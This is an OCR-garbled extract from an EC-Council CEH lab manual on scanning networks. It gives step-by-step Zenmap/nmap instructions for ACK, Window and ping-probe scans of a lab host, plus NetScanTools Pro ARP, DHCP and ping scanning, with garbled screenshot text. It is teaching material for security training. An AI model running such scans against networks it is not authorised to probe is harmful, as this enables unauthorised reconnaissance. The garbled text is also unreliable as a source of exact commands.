nm a p -sN -T4 -A -v 10.0.0.4 Help Description P ro file In fo rm a tio n Profile name Description |A C K PagScanj

‫־‬r a n

Profile [scan | Ping | Scripting | Target | S o ire e [ C thei | Tim ing

The d e scrp tio n is a fu ll description o f wh at the scan does, w h ich m ay be long.

The options: ‫״‬m inparallelism<num probes>; -m ax-parallelism <num probes> (A djust probe parallelization) control the total num ber of probes that m aybe outstandingfor ahost group. Theyareusedfor port scanningandhost discovery. B ydefault, N m apcalculates aneverchangingideal parallelism basedon netw ork perform ance.

£an cel

0

Save Changes

FIG U R E6 .2 9 :TheZ enm apP rofileE ditorW indoww iththeP rofiletab 39. To select the parameters for an ACK scan, click the S c a n tab in die P ro file E d it o r window, select A C K s c a n (‫־‬s A ) from the N o n -T C P s c a n s : drop-down list, and select N o n e for all die other fields but leave the T a r g e t s : field empty.

C E H Lab M anual Page 137

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Profile Editor
n m a p -sA -sW -T4 -A -v 10.0.0.4 H e lp

!- !□ ‫י‬

x
[ScanJ

‫׳‬

The option: — min-rtttimeout <time>, --max-rtttimeout <time>, — initialrtt-timeout <t1me> (Adjust probe timeouts). Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.

Profile | Scan Scan o ptio ns

Ping

S cnpting

T3rg=t

Source

Other

Tim ing

E n a b lea lla d v a n c e d ,a g g r e s s iv e o p tio n s
Enable OS detection (-0 ), version detection (-5V), script scanning (■ sC), and traceroute (‫־־‬ttaceroute).

Targets (optional): TCP scan: Non-TCP scans: T im in g tem plate:

10004 ACK scan (‫־‬sA) None ACK s c a n ( sA) |v |

[34 Enable all advanced/aggressi\ FIN scan (-sF) □ □ O □ O perating system detection (- M a im o n scan (-sM ) Version detection (-5V) Idle Scan (Zom bie) (‫־‬si) FTP bounce attack (‫־‬b) N u ll scan (-sNl TCP SYN scan (-5S) TCP conn ect scan (-sT)

f l Disable reverse DNS resolutior Vbincov\ scan (-sW) 1 1 IPv6 su pp ort (-6) Xmas Tree scan (-5X)

£ancel

Q

Save Changes

FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab 4 0 . N o w c li c k t h e Ping t a b a n d c h e c k IPProto probes (‫־‬PO) t o p r o b e t h e I P a d d r e s s , a n d t h e n c li c k Sa v e Changes.

Profile Editor
n m a p -sA -sNJ -T4 -A -v -PO 100.0.4 [Scan]

G The Option: -maxretries <numtries> (Specify the maximum number of port scan probe retransmissions). When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.

Profile

Scan

Ping

S cnp tin g| Target | Source

jOther

Tim ing

H e lp

IC M Pt im « £ t a m pr # q u * :t
Send an ICMP tim e stam p probe to see targets are up.

Ping o ptio ns □ D on't p ing before scanning (‫־‬Pn)

i

I I ICMP p ing (‫־‬PE) Q ICMP tim e stam p request (-PP)

I I ICMP netmask request [-PM) □ □ Q 0 ACK ping (-PA) SYN p ing (-PS) UDP probes (-PU) jlPProto prcb«s (-PO)i

( J SCTP INIT ping probes (-PY)

Cancel

Save Changes

FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab 4 1 . 111 t h e

Zenm ap m a i n w i n d o w , i n p u t d i e I P

a d d re ss

o f th e

ta rg e t

m a c h i n e ( in d i i s L a b : 10.0.0.3), s e l e c t A C K Flag Sca n f r o m d r o p - d o w n lis t, a n d t h e n c li c k Scan.

Profile:

C EH Lab Manual Page 138

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenmap
Scan Target: Tools Profile Help v Profile: ACK Flag Scan

‫־ם‬

10.0.0.4 nm a p -sA -PO 10.0.0.4 Services

‫פב‬
Scans J

Scan

Cancel

C o m m a n d: H osts

N m ap O u tp u t

Ports / Hosts I T o p o lo g y ] H ost Details

£ 3 The option: -‫־‬hosttimeout <time> (Give up on slow target hosts). Some hosts simply take a long time to scan. This may be due to poody performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.

D e ta ils

Filter Hosts

FIGURE 6.32: The Zenmap main window with the Target and Profile entered 42. N m a p s c a n s d ie ta rg e t I P a d d re ss p ro v id e d a n d d is p la y s r e s u l t s o n

Nmap Output ta b .

r

Zenmap
Tools £ r o fle Help

X

‫ן‬

Sc$n

Target:

10.0.0.4 nm a p -s A -P 0 1C.0.0.4

Profile:

ACK Flag Scan

Cancel

C o m m a n d:

Hosts

Sen/ices

N m ap O u tp u t

j P o r ts /H o s ts [

T o po lo gy

H ost Details

Scans

The option: — scandelay <time>; --max-scandelay <time> (Adjust delay between probes) .This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.

OS *

< Host
10.0.0.4

nm a p -sA -PO 10D.0.4

Details

S t a r tin g Nmap s c a n

^map 6 .0 1 re p o rt

(

h ttp :/ / n m a p .o r g 1 0 .0 .0 .4

) at

2012-08-24

1 7 :0 3

India Standard Tine
fo r

Host is u9 (0.00000301 latency).

A ll 1000 scanned ports on 10.0.0.4 are unfiltered
WAC A d d r e s s : Nmap d o n e : 3 0 :1 5 :5 0 :0 0 :0 7 :1 0 a d d ress (1 host (M ic r o s o ft ) up) scannec in 7 .5 7 second s 1 IP

Filter Hosts

FIGURE 6.33: The Zenmap main window with the Nmap Output tab 4 3 . T o v i e w m o r e d e ta i ls r e g a r d i n g t h e h o s t s , c li c k d i e Host Details t a b

C EH Lab Manual Page 139

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenmap
Scan Target: Tools P rofile H e lp [~v~| Profile: ACK Flag Scan Scan Cancel

10.0.0.4 nm a p -s A -P O !0.0.04

Q The option: — minrate <number>; — max-rate < number> (Directly control the scanning rate). Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.

C o m m a n d:

Hosts OS « Host *

||

Services

|

N m ap O u tp u t ‫ ; ־‬10.0.04

J Ports /

Hosts

J Topo lo gy

H o s tD e ta ls

Scans

10.0.0.4

5 H o st S tatus

State
O pen portc: Filtered ports: Closed ports: S ea m e d ports: U p t im e Last b o o t
B A d d re s s e s

IS
1000 N o t available N o t available

IPv4: IPv6: M AC:

1a0.0.4 N o t available 0Q15:50:00:07:10

♦ Comments

Filter Hosts

FIGURE 6.34: The Zenmap main window with the Host Details tab

L a b A n a ly s is
D o c u m e n t all d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e n d e e s , a n d p r o t o c o l s y o u d i s c o v e r e d d u r i n g d i e la b . T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d T y p es o f S can u sed : ■ ■ ‫י‬ ■ In te n s e scan X m as scan N u ll sc a n A C K F la g s c a n

I n te n s e S c a n —N m a p O u tp u t ■ ■ N m ap ■ A R P P in g S c a n - 1 h o s t P a ra lle l D N S r e s o lu ti o n o f 1 h o s t S Y N S te a lth S c a n • D i s c o v e r e d o p e n p o r t o n 1 0 .0 .0 .4 o ■ ■ ■ ■ ■ ■ ■ 1 3 5 / tc p , 1 3 9 / tc p , 4 4 5 / tc p , . ..

M A C A d d re ss O p e r a tin g S y s te m D e ta ils U p tim e G u e s s N e tw o r k D is ta n c e T C P S e q u e n c e P re d ic tio n I P I D S e q u e n c e G e n e ra tio n S e rv ic e I n f o

C EH Lab Manual Page 140

Ethical Hacking and Countermeasures Copyright © by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Q u e s t io n s
1. A n a ly z e a n d e v a lu a te t h e r e s u lts b y s c a n n i n g a ta r g e t n e t w o r k u s in g ; a. b. 2. S te a l th S c a n ( H a l f - o p e n S c a n ) nm ap -P

P e r f o r m I n v e r s e T C P F la g S c a n n in g a n d a n a ly z e h o s t s a n d s e r v ic e s f o r a t a r g e t m a c h i n e i n d i e n e tw o r k .

I n te r n e t C o n n e c tio n R e q u ire d □ Y es

0 No

P la tfo rm S u p p o rte d 0 C la s s ro o m 0 iL a b s

C EH Lab Manual Page 141

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Scanning a Network Using the NetScan Tools Pro
NetScanToolsPro is an integratedc o lle ctio n of internetinformationgatheringand netirork tro u b le s h o o tin gutilitiesforNehrork P/vfessionals.
ICON 2 3 ‫ ־‬Valuable information Test your knowledge ‫ס‬ Web exercise W orkbook review KEY

L a b S c e n a r io
Y o u h a v e a lr e a d y n o t i c e d i n d i e p r e v i o u s la b h o w y o u c a n g a d i e r i n f o r m a t i o n s u c h as A R P p in g scan, M A C a d d re s s , o p e ra tin g s y s te m d e ta ils , I P ID sequence g e n e r a t io n , s e r v ic e in f o , e tc . d i r o u g h Intense Scan. Xmas Scan. Null Scan a n d

ACK Flag Scan

111 N m a p . A 1 1 a tt a c k e r c a n s im p ly s c a n a ta r g e t w i d i o u t s e n d i n g a

sin g le p a c k e t t o th e ta r g e t f r o m th e i r o w n I P a d d r e s s ; in s te a d , d i e y u s e a zombie

m

host t o p e r f o r m

th e

sc a n re m o te ly a n d i f a n

intrusion detection report is

g e n e r a t e d , i t w ill d is p la y d i e I P o f d i e z o m b i e h o s t a s a n a tta c k e r . A tta c k e r s c a n e a s ily k n o w h o w m a n y p a c k e t s h a v e b e e n s e n t s in c e d ie la s t p r o b e b y c h e c k i n g d i e I P p a c k e t fragment identification number ( I P I D ) . A s a n e x p e r t p e n e t r a t i o n te s te r , y o u s h o u l d b e a b le t o d e t e r m i n e w h e d i e r a T C P p o r t is o p e n t o s e n d a SYN ( s e s s io n e s t a b li s h m e n t ) p a c k e t t o t h e p o r t . T h e ta r g e t m a c h i n e w ill r e s p o n d w i d i a SYN ACK ( s e s s io n r e q u e s t a c k n o w le d g e m e n t) p a c k e t i f d ie p o r t is o p e n a n d RST (re s e t) i f d i e p o r t is c lo s e d a n d b e p r e p a r e d t o b l o c k a n y s u c h a tta c k s 0 1 1 t h e n e t w o r k 111 d iis l a b y o u w ill le a r n t o s c a n a n e t w o r k u s i n g NetScan Tools Pro. Y o u a ls o n e e d t o d i s c o v e r n e tw o r k , g a d i e r i n f o r m a t i o n a b o u t I n t e r n e t o r lo c a l L A N n e tw o rk d e v ic e s , I P a d d r e s s e s , d o m a i n s , d e v ic e p o r t s , a n d m a n y o t h e r n e t w o r k s p e c ific s .

L a b O b j e c t iv e s
T h e o b je c tiv e o f d iis la b is a s s is t t o tr o u b l e s h o o t , d ia g n o s e , m o n i t o r , a n d d i s c o v e r d e v ic e s 0 1 1 n e tw o r k .
1 1 1 d iis la b , y o u n e e d to :

D i s c o v e r s I P v 4 / I P v 6 a d d r e s s e s , h o s t n a m e s , d o m a i n n a m e s , e m a il a d d re sse s, a n d U R L s D e t e c t lo c a l p o r t s

C EH Lab Manual Page 142

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

S 7Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks

L a b E n v ir o n m e n t
T o p e r f o r m d i e la b , y o u n e e d : ■ N e t S c a n T o o l s P r o l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning

Networks\Scanning Tools\NetScanTools Pro
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f N etScan Tools Pro f r o m t h e l i n k h t t p : / / w w w . 1 1 e t s c a n t o o l s . c o m / n s t p r o m a i 1 1 .h t m l ■ I f y o u d e c id e t o d o w n l o a d d i e l a t e s t v e r s i o n , d i e n s c r e e n s h o t s s h o w n i n d i e la b m i g h t d if f e r ■ ■ A c o m p u t e r r u n n i n g Windows Server 2012 A d m in i s t r a ti v e p r iv ile g e s t o r u n d i e NetScan Tools Pro t o o l

L a b D u r a t io n
T im e : 1 0 M i n u te s

O v e r v ie w o f N e t w o r k S c a n n in g
N e t w o r k s c a n n i n g is d i e p r o c e s s o f e x a m i n in g d i e activity on a network, w h i c h c a n i n c l u d e m o n i t o r i n g data flow a s w e ll a s m o n i t o r i n g d i e functioning o f n e t w o r k d e v ic e s . N e t w o r k s c a n n i n g s e r v e s t o p r o m o t e b o d i d i e security a n d p e r f o r m a n c e o f a n e tw o r k . N e t w o r k s c a n n i n g m a y a ls o b e e m p l o y e d f r o m o u ts id e a n e t w o r k in o r d e r t o i d e n t if y p o te n t ia l network vulnerabilities. N e tS c a n T o o l P r o p e r f o r m s th e fo llo w in g to n e tw o r k sc a n n in g :

■ ■ S TASK 1

Monitoring n e t w o r k d e v i c e s a v a il a b il it y Notifies I P a d d r e s s , h o s t n a m e s , d o m a i n n a m e s , a n d p o r t s c a n n i n g

Lab T asks
I n s ta ll N e t S c a n T o o l P r o i n y o u r W i n d o w S e r v e r 2 0 1 2 . F o ll o w d i e w i z a r d - d r i v e n in s ta l la t io n s te p s a n d in s ta ll NetScan Tool Pro. 1. L a u n c h t h e Sta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t c o rn e r o f th e d e s k to p

Scanning the Network

^ Active Discovery and Diagnostic Tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses..

4

W in d o w s S e r \ * f 201 2

'1J#

*ta a ta ie rm X n ifa e m e CvcidilcOetoceitc
EMtuaian copy, luld M>:

FIGURE /.l: Windows Server 2012- Desktop view 2. C l i c k t h e N etScan Tool Pro a p p t o o p e n t h e N etScan Tool Pro w i n d o w

C EH Lab Manual Page 143

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt
Server Manager Windows PowwShel Googfe Chrome H jperV kb-uoa NetScanT... Pro Demo

Administrator A

h

m
Control Pan*l

o Hjrpw-V Mdchir*.

‫וי‬

f*

Q e

V
('nmittnd I't. n.".‫־‬ w rr

©

*I
20‫ ז‬2

x-x-ac

n

9
FIGURE 7.2 Windows Server 2012 - Apps

3.

I f y o u a r e u s i n g t h e D e m o v e r s i o n o f N e t S c a n T o o l s P r o , t h e n c li c k

Start the DEMO
£L) Database Name be created in the Results Database Directory and it will have NstProDataprefixed and it will have the file extension .db3 4. T h e Open or C reate a N ew Result Database-NetScanTooIs Pro w i n d o w w ill a p p e a r s ; e n t e r a n e w d a t a b a s e n a m e i n D atabase Name

(enter new name here)
5. S e t a d e f a u l t d i r e c t o r y r e s u l t s f o r d a t a b a s e file l o c a t i o n , c li c k Continue Open or Create a New Results Database - NetScanTools® Pro
N etScanToote P ro a u to m a b c a ly s a v e s resu lts n a d a ta b a s e . T h e d a ta b a s e «s re q u re d . C r e a te a n e w R esu lts D a ta b a s e , o p en a p re viou s R e s d t s D a ta b a s e , or u s e this s o ftw a re r T r a n n g M ode with a tem po rary R esu lts D a tab a s e . ■‫״‬T rain rtg M ode Qutdc S t a r t: P re s s C r e a te Training M ode D a ta b a s e then p re ss C o ntinue.

*‫ו‬

D a ta b a s e N am e (e n te r n e w n am e h e re ) Test|

A N E W R e s u lts D a ta b a s e w l b e a u to m a b c a ly p re fixed with ,NstProO ata-' a n d w i en d w ith ,. d b ? . N o sp ace s o r periods a r e allowed w h en e n te r n g a n e w d a ta b a s e nam e. R esu lts D a ta b a s e File Location R esu lts D a ta b a s e D irectory

S e le c t A n o th er R esu lts D a tab a s e

‫ *״‬C re a te Trainmg M ode D a ta b a s e

C : ^jJsers\Administrator d o c u m e n ts

P ro je ct N am e (o pb on al) S e t D e fau lt D irectory

A n a ly s t In form ation (o pb on al, c a n b e c isp laye d r\ rep o rts if desired) N am e Telep h on e Number

Title

Mobile Number

i—' USB Version: start the software by locating nstpro.exe on your USB drive ‫ ־‬it is normally in the /nstpro directory p

O rganization

Email A d dress

U p d a te A n a lys t In form a bon

U s e L a s t R e s u lts D a ta b a s e

Continue

E x it Program

FIGURE 7.3: setting a new database name for XetScan Tools Pro 6. T h e N etScan Tools Pro m a i n w i n d o w w ill a p p e a r s a s s h o w i n d i e fo llo w in g fig u re

C EH Lab Manual Page 144

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

test • NetScartTools* Pro Demo Version Build 8-17-12 based o n version 11.19
file Eflit A«es51b!11ty View IP«6 Help

— IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2 0 0 1 :4 8 6 0 :b 0 0 6 :6 9
( i p v 6 .g o o g l e .c o m ) o r ::1 (internal loopback address

Wefccrwto NrtScanTooh#f^5 [W o Vbtfen 1 1 TH fattwaiv n a drro ro< k>* •re* t00“i C u t
Th■ du ro M i a be ccn«e>ted to j W vtfden
H m x x d '•on ■hr A Jo i^ e d cr Vtao.a tads cr 1» ‫ »|כ‬groined by fuidian on the kft panel

1

todi hav• niror luiti

R03 iso- root carract :‫ «־‬ta‫״‬oet. orwn icon :coa I8!en to net« 11k traff c. ttu ; icon tooo ‫*®•ו‬ oca sy*em. end groy !con loots contact •hid p51t> w * a w Autom ated too is M3nu3l lo ci: 13III fw o rn e tools *LCrre Dtt<ov<r/tools Pass ‫׳‬ve 0 ‫ י‬scow 1y ro ois
o t « 0015‫ז‬

Fleet ' i t FI

wfyoj '« & ,to vie‫ ״‬C <?a te rg h * local help !ncLdng Gerttirg Suited tfa m & xi

P 3 « tt 1*vn toon tx tm u l >00is

proown into

FIGURE 7.4: Main window of NetScan Tools Pro 7. S e l e c t Manual Tools (all) o n t h e l e f t p a n e l a n d c li c k A R P Ping. A w i n d o w w ill a p p e a r s f e w i n f o r m a t i o n a b o u t d i e A R P P i n g T o o l . 8. C li c k OK
test
File fd it AccettibHity View IM

NetScanToois® Pro Demo Version Build 8 17 12 based on version 11.19
MHp

‫־היד‬°• - ‫ז‬
Klrt'iianTooltS Pio ' J

Automata!! Tool Manual Tool( M l

About the ARP Ping Tool
• use rhK tool to ‫*חקי‬. ' an IPv4 address on your subnet usino ARP packers. »s<it on your LAN to find the 1a*>:‫*'׳‬£ tkne o ' a device to an ARP_REQl)EST jacket evai if 3ie d&r ce s hidden and
does not respc *d to ‫־׳‬ egu a Pn g .


A R P Pina require*,‫ ג‬target IPv4 address on your LAN.
D o n 't miss th is special fe a t u re in th is to o l: Identify duplicate IPv4 address b y ‘singing‘ a ssecfic IPv4 address. If more th a - Gne Cevice (tw o or rrore MAC addresses} responds, you areshow n the a d d ie a o f each o f the deuces. D o n 't fo r g e t to r!ght d k * in th e results for a menu with more options.

mac

£ 7 Arp Ping is a useful tool capable of sending ARP packets to a target IP address and it can also search for multiple devices sharing the same IP address on your LAN

im
ARP Scan (MAC U a Ca«h« F m n it d

D em o I im ita tio n s. • None.

ij


Co*n«t»o« Monit.
c Tooll

A1 1 1 vc Dhiuveiy To‫׳‬ Piss ‫״‬re Otttovety T« o n s roots
p 3c« t Level

root

brcemai toots Pro 0r3m Into | ( <x Help pres* FI

FIGURE 7.5: Selecting manual tools option 9. S e l e c t t h e Send Bro adcast A RP, then U nicast A R P r a d i o b u t t o n , e n t e r t h e I P a d d r e s s i n Target IPv4 Address, a n d c li c k Send Arp

C EH Lab Manual Page 145

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

test
File Fdit Accessibility View

NetScanTools® Pro Demo Version Build 8 17 12 based on version 11.19
Help

,- !‫ ״‬s i

IPv6

Q Send Broadcast ARP, and then Unicast ARP this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box

A u tow ted Tools ►.lanual Tools lalf)

U9e ARP Padtets to Pnc an [Pv« adjf c55 on y a r
subnet.

E Send B‫־‬
O

ooCC35t ARP, then
arp

U ito st ARP
Dupi:a;-5 S ‫־‬c ‫מ‬

O send B-oaCcae:

cnly

S e * th for Dipica te IP Addesoss

U
ARP Ping

T a rg e tIPv4A a dett
I ndex
ip

(f:0 0 . 0 0 O l^ F A d *
cc cc ce cc cc 0.002649 :. o : :» t o 0.003318 0.002318 0.0:69*3 0.007615 0.002518 0.M198C 0.0:165$ 0.0:231.8 0.002649 0.0:2649 0.002318 0.002318 O.OS2649

A n ® To Automated |

R e p o r t ?
Q Add to Psvorftoc

Aaaress

mac

Address •• • * ♦ < * ♦ - ■ +

Response Tine (aaeci

Type Broadcast Unicast tin Ic a a t Onieaae ur.ic a a t Cr.le a s t Cr.Ic a a t Tinic a a t Onieaae Ur.ic a a t U n icast U n icast U n icast Unicast Vnicaat Unicast

y
AflP^can ■ an |MA£ |MAC S<»n)

ie n d A r c
S to p
N jr b n to Send

0 1 2 3 4 5

10.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1 1 0.0.0.1 10 .0 .0 .1 10.0.0.1 10.0.0.1 1 0.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1 10.0.0.1

‫־‬ • -

Cache Forensic{
Cyde T ne (ms)

u

• • — ♦ *• • * <» •••♦ ♦ ‫־‬ *• < • >

cc cc cr cc cc cc cc cc cc cc

I“0 0 EJ
Connwtwn Monitor |v | Fawortte Tooli Aa!re DHtovery Tool! Pj 11!x< Oiiovcry Tooli O t« Tools P a « « level rools trte m ji looit f*‫־‬coram Into
WnPcap Interface P

f ‫ל‬ 8 3 10 11 12 13 14 15

• • » • ‫'־ ♦ •־‬

• • • • • • » «♦ ‫״‬ •

FPuiger 7.6: Result of ARP Ping 1 0. C li c k A R P Sca n (MAC Sca n ) i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i t h i n f o r m a t i o n a b o u t t h e A R P s c a n t o o l . C l i c k OK
test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
File Fdit Accessibility View IPv6 Help

!a lT ool! •A R PP i‫׳׳‬y J
Automated Tool

About the ARP Scan Tool

‫ ש‬ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices.


Use U ib t o o l l o s e n d a n A R P R o q iM & t t o e v u ry IP v 4 ad d ress o n y o u r LAN. IPv4 connected d «v u et c s n n o th n to f tv r ‫ ־‬ARP 3acfc«C» and mu»t ru p o n d with t h • ! IP and MAC a d f i r • * • . Uncheck w e ResoKr? box for fssrti scan co‫׳‬r p i« o n ome.

f>5

Don't Cornet to 1io : d ck n the 1e>ul:s for a menu with moio options.

y
ARPStan 1 mac sea

mo L im itation s. H one.

p• ‫־‬
oadcast

ic o s t

lease
le a s t le a s e

Ca<n« ForcnsKs

ic a s t le a s t le a s t
le a s t

ic a a t Attn* Uncovefy 10‫׳‬ relive l>K0v»ry l« e a s t! east !
le a s t

H 3«rt level Tool

icaat

FIGURE 7.7: Selecting ARP Scan (MAC Scan) option 1 1. E n t e r t h e r a n g e o f I P v 4 a d d r e s s i n Starting IPv4 Address a n d Ending

IPv4 Address t e x t b o x e s
1 2. C li c k Do Arp Scan

C EH Lab Manual Page 146

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

test
File Edil Accessibility View

NetScanTools* Pro Demo Version Build 8-17 12based0nvefs»00 11.19
Help

‫“־היו‬

‫־‬ ‫י־‬

IPv6

Manual Too 4 -ARP Scan (MAC Scan) $ in tonated Toots kUnuai Tools laif) U9e thE tool a fine al Staraic F v 4 Accrea‫־‬

active IPv4 d r ie r s o‫י׳‬ youi n im -t.

| :0. 0

a d jK o c c
[ J j ‫׳‬p 0 ‫ ־‬A 1 2 r a a l

& v 4 n gIPv4A < * jr c 5 5

ARP Ping

ip v l M . . . 1 0 .0 .0 .1

W 1 CAdtireflfl 0 ( ‫׳‬
EC .

I ]A d d t s ^ a v a K a t
I / r M 4 n u r* c f3 re r n e t;c a r, la c . B c a ta ■ *

1

E n tr y Type dynam o d y n azd c

l>5c•!

10. 0 .0

10.0.0 .2

&»11 lac

vm-MSSCL.

1 0 .0 .0

‫־‬ ar The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.

can (M AC Scan) ASP Scan (MAC

wrtpeap Interfax i p

Cache forennct

u

I 10.0.0.7
Scon OSsy T n c {•> »)

(IZZ₪
Connection Monitor Favorite Tools Active OhcC‫׳‬vify Tool! Pasiive Ofitovtry Too 1 1 o m Tools P3<Mt LPV8 1 Tools exttmai toon r^ooram Into 0 Resolve P s

‫פב‬
FIGURE 7.8 Result of ARP Scan (MAC Scan)

1 3 . C li c k DHCP Se rve r D iscovery i n t h e l e f t p a n e l , a w i n d o w w ill a p p e a r w i t h i n f o r m a t i o n a b o u t D H C P S e r v e r D i s c o v e r y T o o l . C li c k OK
f*:
f4 e Ed* Accessibility

test - NetScanTods® Pro Demo Version Build 8-17-12 based on version 11.19
View IPv6 Help

!‫־‬

n '

*

RPScan IMAC Son ,

A u to m a te dlool M an u al 1 0 0 1 1!all
Cat he Forensic!

Alum! Hit* DHCP Sorv 1*f Discovery Tool
• Use Uib 1004 to jitn n iy locate DHCP *ervur* < IP v l only) on your local network. It iho m th« P addr«u and o r « M C'qt ar« b«ng handed out by DHCP wwao. Ih it too! a n aw find unknown or rooue' DHO3 swverj. • Don't I otget to right dck n th* results for a menu with more options. Dano limitations. • None. cry Type lo c a l
n a x le 1 0 .0 .0


Connection Monitc

naxic

10.0.0

LJ DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP serv.

O K PSfw r Oucorc

DNS -Tools Tools-core «

a J

Pn u n r DutoveiyTc

P « l r l level Tool External Too 11

FIGURE 7.9: Selecting DHCP Server Discovery Tool Option 14. S e l e c t a ll t h e D iscover Options c h e c k b o x a n d c li c k Discover DHCP

Servers

C EH Lab Manual Page 147

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

I
Q NetScanner, this is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations

y

test - NetScanTools* Pro Demo Version Build 8 -1 7-12 based o r version 11.19

T~Tn 1 « '

Aurcmated To0 1 5 Fnri DHCPServers an fa r For Hdo. p‫׳‬e £ 8F:
Cache F orenwes

AddItoie IM A ‫ ס׳יד״־ג‬A.‫־‬ omv‫־‬rd ‫*״*־‬ ‫[ ־‬

'‫ * ״‬° ] ‫־‬ Ode or mtrrfacc bdow then crcos Discover
Discover ( X P Server* TM A d d re ss KIC A dd reas L . Jfc j%‫» ־‬v 4 1 1 iD

.:n n cc t o n Monitor

B

QAddtoP®»«nre5
I n t « r f « r • D e s c r ip tio n Hyper-V V ir ta • ! Eth ern et Adapter #2

Stop
DHCP S«1 1 » ‫ ׳‬Dfccovtry

10.0.0.7

Wat Tim e (sec)

DfIS T Took ook -! Cote

a
a

DiscouB‫ ־‬Opttans ‫ ׳י‬H05tn3r1e V Subnet M5*r V ‫ ׳‬Donor ftairc

Rssordnc DHCP servers
EHCr Server IP

Server Hd3LnoM Offered I? 10.0.0.1 10.0.0.2

Offered Subnet Mask IP Address I ‫ י‬SS.2SS.2SS.0 3 days, 0:0(

10.0.0.1

OWSTools ■Advanced
F‫־‬worit« Tools A<tfc« Dii coveiy Tools Paislv* Discovery Tools DNS Tooll =*>«» t r r t l TooH W * rnjl Tools P10 g r« n into

‫ ׳י‬d n s p ‫ ׳י‬Router P fa * KTP Servers

FIGURE 7.10: Result of DHCP Server Discovery 1 5 . C li c k Ping scan n er i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i t h i n f o r m a t i o n a b o u t P i n g S c a n n e r t o o l . C li c k OK
test
F8e EdK AtcesiibiRty Vltw

NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
H«tp

IPv6

A

j.jA IC
WtKOIM AUtOIMt«J ToO h
M jn g jJ T00K (4 1 1 :

N«tSunT00i13 P 10 S?

About the Ping Scanner (aka NetScanner) lool
• use rim rooJ ro pmo . ‫ י‬ranoe or lm of IPv4 addresses. rtvstool shows you cb rompute‫׳‬s are active w tJiir! tr*rano^ii5t(tJ1* hav« to rapond to omo). Uso it *vith * * u t o f F adflf«s«s. To teeafl ee*‫׳‬ces n your subnrt mdudmg trios*blocking ping, you can um ARP Son tool. You can ■nport a text lest of IPv4 addresses to png Don't mres this speaal feature m this took use the Do SMB/NBNS scan ‫ס‬ ‫ כ‬qg: n « B » S resoonscs fiom unprotected W!ndo*s computers. Don't forget td nght didc m the results for a menu with more opaons.

Pn g

m

1

ErV1«K«J

> 10

fir ,g m £0 Port Scanner is a tool designed to determine which ports on a target computer are active Le. being used by services or daemons.

• •

Graphi cal

a
Port Scanner
P ’o am u o in Mod* * > < «

